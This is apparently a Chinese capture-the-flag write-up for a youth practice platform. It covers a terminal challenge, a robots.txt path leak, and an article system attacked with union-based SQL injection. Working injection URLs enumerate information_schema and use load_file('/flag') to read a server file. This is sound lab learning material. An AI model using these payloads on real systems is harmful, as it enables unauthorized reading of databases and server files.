青少年ctf练习平台--做题wp(1)
1.黑客终端
界面为终端页面,flag一般在主路径下,我们使用cat 查看文件
cat /flag
2.robots
这题是robots文件,他是一个爬虫的规范库,写的路径是不允许被爬取的,会暴露路径,
我们查看后发现有个f1ag_1n_the_h3re.php,拼接路径,访问
3.文章管理系统
3.1弯路测试
(搞偏了,如需跳过,直接看3.2)
打开环境后点击下一章,看url有存在id字段,测试sql注入。
存在sql注入,继续测试。测试为两个字段。
1,2字段均可回显,查看版本,判断是否为5.0以上。
数据库名为word。再查询表。
库和表和字段为:word,articles,
查询这个word字段后发现flag不正确。那可能是数据库不对,所以得重新查下数据库(为啥不查同数据库的别的表呢,因为这个库就一个表,所以就得换库)
重新查询下数据库如图:information_schema,ctftraining,mysql,performance_schema,test,word
最后在ctfrainging库里发现关键词语flag_table,表,然后再继续测试。
http://challenge.qsnctf.com:31069/?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema="ctftraining" --+
再查下表的列:
http://challenge.qsnctf.com:31069/?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema="ctftraining" and table_name="FLAG_TABLE" --+
查询到字段为
查询后没值,所以再找。发现查询不到值。实在搞不出来,有点了下提示。
3.2提示后再测试
提示说要执行命令,哦哦,那就是得用load_file,去查询下flag文件,直接掏出语句
http://challenge.qsnctf.com:31069/?id=1 and 1=2 union select 1,load_file("/flag") --+
出flag,结束,想不到好简单,一直查数据库,走了太多弯路。